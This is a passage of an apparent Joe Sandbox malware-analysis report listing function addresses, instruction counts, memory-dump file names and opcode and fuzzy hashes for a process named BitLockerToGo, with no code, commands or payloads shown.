Instruction Fuzzy Hash: F0D1F472A483116FCB14CE64D4407ABBFE9BFC5318F19892DE8998B282E774DD448BD1

Function 00542D77 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

pq, xrefs: 00542F22

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: pq
API String ID: 0-1239689891
Opcode ID: ec56b9422be7362e30d7cd96b843810b9ef2ebd1cc11dfe14005ee9738898575
Instruction ID: 7e954d2446d9ef86b70ec0af552067afb5c8998e9c958be01d9e9c75692ce303
Opcode Fuzzy Hash: ec56b9422be7362e30d7cd96b843810b9ef2ebd1cc11dfe14005ee9738898575
Instruction Fuzzy Hash: A051CCB01183119BC7109F24C8627ABBBF1FF92758F84894CF8C68F251E3798945DB56

Function 00542A70 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

lc, xrefs: 00542B36

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: lc
API String ID: 0-1546258102
Opcode ID: 753d5866a14874b63cab96522448c7db77af71dcd94a1c2dcef96b5c78e9a978
Instruction ID: d3a6043f5dba6a081a82afb2b90f5bf34d46a8165ee5f674820d085d332c8a82
Opcode Fuzzy Hash: 753d5866a14874b63cab96522448c7db77af71dcd94a1c2dcef96b5c78e9a978
Instruction Fuzzy Hash: AD41CEB05083218AC724CF19D8927ABBBF0FF96318F54891CF8964B285E7B8C544CB87

Function 00527D70 Relevance: .8, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45c54420d1b8b32385189829cc1e04a022b92b181644eafbb65e02bcb32c41d
Instruction ID: 874ea55420b87fd6c7004e2683e163d35a8b4e87f987708612215f9ded72728d
Opcode Fuzzy Hash: a45c54420d1b8b32385189829cc1e04a022b92b181644eafbb65e02bcb32c41d
Instruction Fuzzy Hash: 545204316093218BC725DF58E88027EB7E2FFD5308F29892DD996972C5DB34E951CB82

Function 00559E30 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c8a2d0fb54bb4a27aa6a32aebc9abd54265757ddf4c98597ac30ac4acd819b
Instruction ID: cdca0938f4f75b6599824cc995ae0965e3b9ccde074236ed8008d9248db7e080
Opcode Fuzzy Hash: f0c8a2d0fb54bb4a27aa6a32aebc9abd54265757ddf4c98597ac30ac4acd819b
Instruction Fuzzy Hash: 36B15672A043108BE7149E699C6576BBBD9BBC5315F084A2EFD94D3381EA35EC08C792

Function 005473D0 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7132a32c8c9acac5b9d82fdf9273d22af1e1829832b3a1bda7b79a400fa7a87
Instruction ID: a090025540ec5ff1a23e25b24b5c98cd1fe4024bc19f1c4169526ec591ec7c58
Opcode Fuzzy Hash: b7132a32c8c9acac5b9d82fdf9273d22af1e1829832b3a1bda7b79a400fa7a87
Instruction Fuzzy Hash: 629107B45497818AE3228B388491BF3BFD1FF67304F18589DE1EB0B252D376291ACB55

Function 00539290 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f996437387cf5025c1b47b733066759de32e7736aed10ed82b7f68f4b2bddbb
Instruction ID: c3f46681a3aa2ec96e170dc8fbfa7cecc8758b3ce913ce151022f5903915072f
Opcode Fuzzy Hash: 5f996437387cf5025c1b47b733066759de32e7736aed10ed82b7f68f4b2bddbb
Instruction Fuzzy Hash: A4A100B5A0C3528FC711CF28C88056EBFE1BF95314F188A7DE8A48B392D7759945CB92

Function 0053C480 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7956bb5d0a83121115639482558ee26d38222f24fb779e71161929c0757be9d
Instruction ID: a2c339d10a798939052b1a90d8fda8acc13f7c94f1a5676286e539d96c992beb
Opcode Fuzzy Hash: a7956bb5d0a83121115639482558ee26d38222f24fb779e71161929c0757be9d
Instruction Fuzzy Hash: 1E51CDB26002149BDB209F28CC96B777FA8FF86354F085918F986DB290F774E904C762

Function 00559830 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7093a3d056c1b312e1be535059c24b31c38d8c495b8bb67b798fde0df4f18d52
Instruction ID: 6b3b2db23901c1cb220119c48180149be31413f5bda9a98dc90776fb5ff8b3e7
Opcode Fuzzy Hash: 7093a3d056c1b312e1be535059c24b31c38d8c495b8bb67b798fde0df4f18d52
Instruction Fuzzy Hash: 8E515A727052119BC7198A28CCA173FB6E3BBC5711F2D822DE886573D5DB749C098691

Function 005294F0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0b5d2700bb8af450f0d45d50400f7ba5e2314a64ad967f1589709c4dea5ca6
Instruction ID: 4da2d9a7e17ffcc7519f3b3416cbfec2ed3565fcd634ce4a5b50bd0d57d4eef8
Opcode Fuzzy Hash: cf0b5d2700bb8af450f0d45d50400f7ba5e2314a64ad967f1589709c4dea5ca6
Instruction Fuzzy Hash: F94149717453A85BEB218A2898817FA7FD4AF93310F18C53DED888B3C2E234D905D365

Function 00522660 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ff64a0f2e608e85dd80d66e126acdc5a56ea3d778b37ffd8f8255063b933ce
Instruction ID: a1d4850fe56069de913da22ee406545757f6cd2ed0e401e98a4ee5c8f5ee67b6
Opcode Fuzzy Hash: 95ff64a0f2e608e85dd80d66e126acdc5a56ea3d778b37ffd8f8255063b933ce
Instruction Fuzzy Hash: B83148BA5083656BC7241F3968C4276BFA5BF97310F194478E889872D2E271DD898361

Function 0055B722 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c643a0a28a69b38ffba9a526d6d73f36537f224bacab099543396b6f4234a70
Instruction ID: 2b5332da63599458d0a4a8a0cccfa8cf6294d21f48a69fb54cc9fbbcf0beecfa
Opcode Fuzzy Hash: 6c643a0a28a69b38ffba9a526d6d73f36537f224bacab099543396b6f4234a70
Instruction Fuzzy Hash: BA217F3390C3A80FD3188E785895226BFD29FCA311F4F927EC8904B292EEB54D0D86C4

Function 00534BD2 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0849aeefc7ddc3d9874f629471b75dd60f9ccf914856cb542aac47cd7beed75b
Instruction ID: 5553926ed9e052bddc329a886c40172539e6ba228e355516ed54f31d394ce0a4
Opcode Fuzzy Hash: 0849aeefc7ddc3d9874f629471b75dd60f9ccf914856cb542aac47cd7beed75b
Instruction Fuzzy Hash: 9421AD71000A018ACB259F38D8A1BB3B7F1FF96324F09894DE5A68B2A1EB74A400DB51

Function 00559270 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e523d83cfbcf76a5e1bae7ec6af0157475193ac788831f76517af930af83916
Instruction ID: c1468ebf6bebe1007a786eaabe01e010299ad12794d114d20536abacc72e5d0d
Opcode Fuzzy Hash: 0e523d83cfbcf76a5e1bae7ec6af0157475193ac788831f76517af930af83916
Instruction Fuzzy Hash: 92214B31B586614FC708CF3848E113BFBE6ABDA224F49866EC565C71E1D725D90A8B80

Function 00533ABF Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad2ca6ffae4b87dad7406b1f669c45112227157429ac7a9361c1f362aa9efb5
Instruction ID: d4c326691bfafc3eb4332f9f3c03c6ef51071534f9c2c92b74e18e9c0921c254
Opcode Fuzzy Hash: 5ad2ca6ffae4b87dad7406b1f669c45112227157429ac7a9361c1f362aa9efb5
Instruction Fuzzy Hash: 9E21AEB2D1122687CB209F14CCA25B7F7B1FF913A1B198654DC965B381F7789E80C794

Function 00521F10 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac62685773c58682c2059261c804275be2c8970e5a5e4b874c29fbc6a298a4a
Instruction ID: 27d3fd959cc52969489a081a7b023e3b724ab3a69f513e3d9b8481ba0506fca3
Opcode Fuzzy Hash: 1ac62685773c58682c2059261c804275be2c8970e5a5e4b874c29fbc6a298a4a
Instruction Fuzzy Hash: CB31B5316086219BD7109F58E980937BBE1FF96354F18892DF8AA872D1D731DC42CB56

Function 0053DC5A Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb1495111e7abb5016dfce80d0f28ca9bdefd320809d032bea1d51fc71fe80f
Instruction ID: a35d9e062b793b2350cb1e539701112d79b46c734f0f5c8b2578fd5dc97e0369
Opcode Fuzzy Hash: acb1495111e7abb5016dfce80d0f28ca9bdefd320809d032bea1d51fc71fe80f
Instruction Fuzzy Hash: 3431ACB15093908BE324CF14D891B6FBFE5EBD5314F148A2CF4D59B2A1D778894A8B83

Function 00533960 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7870e7cf9a2651936558c9babb3703da1026fb4e3df559288fb44f2af94eeaf
Instruction ID: 3f398f99e53a3c4e920dee9da839607335f550cb11cdadb65ba6f59b067cdce3
Opcode Fuzzy Hash: b7870e7cf9a2651936558c9babb3703da1026fb4e3df559288fb44f2af94eeaf
Instruction Fuzzy Hash: 5901D262A00211C3C7209F28CC92A73B7B8BF56364F598214E8669B3C1F7B4EE04C3E1

Function 0054FC10 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 6c27487904abe41b13cb9846e5e66ec4b8511f4abf29a52a792901d598e5cfe5
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: AC11AC3364D1E90EC3158D3C84805A57FD31A93639B5943A9F8B89B1D2D5228D8A9355

Function 00543CA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca41b713dd7dd2d53d7fcb7448b78b9d6e7f97051aad3a1287c73cab64d20cb6
Instruction ID: e8c6664f020e7b07fbcd4411fafc54543a3cb7cefc0761d78639b75c006ba0b7
Opcode Fuzzy Hash: ca41b713dd7dd2d53d7fcb7448b78b9d6e7f97051aad3a1287c73cab64d20cb6
Instruction Fuzzy Hash: 3B01B1F2A0131247DB20AE55E4C5B7BBAB87F81748F18042CE80557342DB71EE08C691

Function 0053F7D8 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae8df93929c706ac3b61e2441201d8c1d2c348a85b17fa58afedf52aec32750
Instruction ID: 2c14e883fd8439c74f5c900853956f2cee77c627f8178a2e6daab24e17c680e7
Opcode Fuzzy Hash: fae8df93929c706ac3b61e2441201d8c1d2c348a85b17fa58afedf52aec32750
Instruction Fuzzy Hash: E9018435A0A600DFD7188B24C95093FFBA1FBD5714F651A2CE89223671C770EC01DB82

Function 0053F710 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48bcc383ba1dc5bf6b1204256c1279d0bee62d48da2d2f0de550230590093ef9
Instruction ID: 26f735e42a3c8f1f4b3bcfc89807a781394d62f934de8453349f2a57920c3d92
Opcode Fuzzy Hash: 48bcc383ba1dc5bf6b1204256c1279d0bee62d48da2d2f0de550230590093ef9
Instruction Fuzzy Hash: 4C01C0356182009FD7098F28E89093BB7A2FBA6755F54992CE08363161C772ED4BCF85

Function 005347D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f603cac06b734bda0b970e5b16727069ae5e0e855a1438700608dfedd0a6508d
Instruction ID: e8edd3866d024d2eb5fb9be797339409ad44e65b1799f517291b89b142697770
Opcode Fuzzy Hash: f603cac06b734bda0b970e5b16727069ae5e0e855a1438700608dfedd0a6508d
Instruction Fuzzy Hash: E7115532501A418FC3258F3C8881456B7A2FFE332471A866EC0E94B7A3DB31D94B8784

Function 005581BF Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3871c5fc9c709347a3151bb140cb4eb7fd5c1bfc1cea3d12b2f5f603c3026932
Instruction ID: 85704c8e02f767746cac838b01bedc40f231b5e18a480ef7b53cecb0309fa24e
Opcode Fuzzy Hash: 3871c5fc9c709347a3151bb140cb4eb7fd5c1bfc1cea3d12b2f5f603c3026932
Instruction Fuzzy Hash: 40012DF4C01204BBDB40EFA9ED4759EBE79AB46221F58422AF84477345D231041E8BE3

Function 00543886 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f39aada83e9efd88215dac0b6f7664cb0f76e25ba1a078eec7b4771513af7530
Instruction ID: ff6a8680d5c0cd93438d199d559236d518d16e2c179f483f90cd64941631d602
Opcode Fuzzy Hash: f39aada83e9efd88215dac0b6f7664cb0f76e25ba1a078eec7b4771513af7530
Instruction Fuzzy Hash: 7C012871E0A300CFD3188F18D89277ABB61FBAA328F184A2DE44523162C7B5CD4A8B55

Function 005335E0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: aec9cfbf4b6364aba83e381510de0a55a09a30413bb2aaa51c073dad037f68f8
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: 0D01A267A013129B8324CE5CC4D16ABB3B0FF95B94B1A445DD5415B370D7319D158264

Function 00557B08 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ecccec5758a69277ae18a04f0ed3285a986a5cf3800d65013b0914b9c2b99d5
Instruction ID: cac3f62113a2d7626cbeeac3ba62c759dc5c104e3a6d84bf9206a65618c15d06
Opcode Fuzzy Hash: 6ecccec5758a69277ae18a04f0ed3285a986a5cf3800d65013b0914b9c2b99d5
Instruction Fuzzy Hash: 3F01C0B19293808BD7089F24E56561FBBF5BBE6301F486D2DF592C7651E774C4098B03

Function 00553C0F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9d1f15141d479650b27aa3034152b4b5a468606fed9e75f5dacef1631fa960
Instruction ID: 44df74951bc16c56faf6e9f786f044f8303b5720b00401b5732810ccbe1737f6
Opcode Fuzzy Hash: 3b9d1f15141d479650b27aa3034152b4b5a468606fed9e75f5dacef1631fa960
Instruction Fuzzy Hash: 10F0222291C2718AC704DF28900217BF7F1BF51B06F19982ECCC0B7246D236CE48CA82

Function 0053524F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be46ac054bfddfd0d5368cdcf921fb790f41f764764cdef0d7dddbca6b43c080
Instruction ID: 5e598b8eb21ed98106f3aabcc06b3f8b126a94c7cb687303849623ce83c9ef5d
Opcode Fuzzy Hash: be46ac054bfddfd0d5368cdcf921fb790f41f764764cdef0d7dddbca6b43c080
Instruction Fuzzy Hash: 34E030B1500F009BE325EF34D866766B6E5BF55344F41481DE567435A2EB70F018C608

Function 0052E482 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a21a0fe4e872c4a2836c011d7538da6e7f318107769a4f2d14a6d0065662fae
Instruction ID: be853f79dbd977ff9d6db8598bcfa9c4f8e83262b1dddc6f5ce5fb59f5fa6e5c
Opcode Fuzzy Hash: 4a21a0fe4e872c4a2836c011d7538da6e7f318107769a4f2d14a6d0065662fae
Instruction Fuzzy Hash: D2F0FE3142826187C678FB14D865DFDB7647FE2348F05051CD89A136919E246946DA91

Function 0052CCBB Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bcac78dcadb3e9dfb3b10a2fa37d29c6bd1a8653a44dd73c31d879f507edf11
Instruction ID: cefdbe4db7d73e4b1e856b6a53335eab976d072989fc735eaa174a9a44cfcf38
Opcode Fuzzy Hash: 4bcac78dcadb3e9dfb3b10a2fa37d29c6bd1a8653a44dd73c31d879f507edf11
Instruction Fuzzy Hash: 65E067B191C641BFE254CF28DC80DBBB3EDFB6A206F042918FA55D3160CA31DC54DA29

Function 00540C99 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b89895770b6a09bdb997aaa27b2b4240868da8d7db00d7b610687917677959f
Instruction ID: 8725f068bf8b1dfb73c7f0c71895f6be57584f0d649defe93d39c6289bf882a2
Opcode Fuzzy Hash: 4b89895770b6a09bdb997aaa27b2b4240868da8d7db00d7b610687917677959f
Instruction Fuzzy Hash: CCE08C70A48643C6C7198E29A0A43B1AF772B97308F38A9B8CA805B2C6C577C807A124

Function 0052BE63 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b85b7c48717be22c4d80fb9443e2d5a0a80d68075e490b777b04226981588f
Instruction ID: ac7be98ac6a69eec2c6d8cadf5b185c793c96aea1c24edc2422a5a3c9f98e1bd
Opcode Fuzzy Hash: 39b85b7c48717be22c4d80fb9443e2d5a0a80d68075e490b777b04226981588f
Instruction Fuzzy Hash: 29D05E71904A00DFD3258F68ED80973B7FABF9E301310592CD04783560EFB0E8099B24

Function 0052C577 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2e5dab87bb42bcbd30298c33b5f97e79d8b7f3dc0bcab2b3c504b1af2df7fb
Instruction ID: 7762af9d95724d2d1c023ca1fc121581847965b4807c5f37fb8e9deee9c3baa6
Opcode Fuzzy Hash: bb2e5dab87bb42bcbd30298c33b5f97e79d8b7f3dc0bcab2b3c504b1af2df7fb
Instruction Fuzzy Hash: 6CC08070AA020056D17CCF288C41F37F56F5B96505F207515D4023B2C38AB4E405558C

Function 0052E3C4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

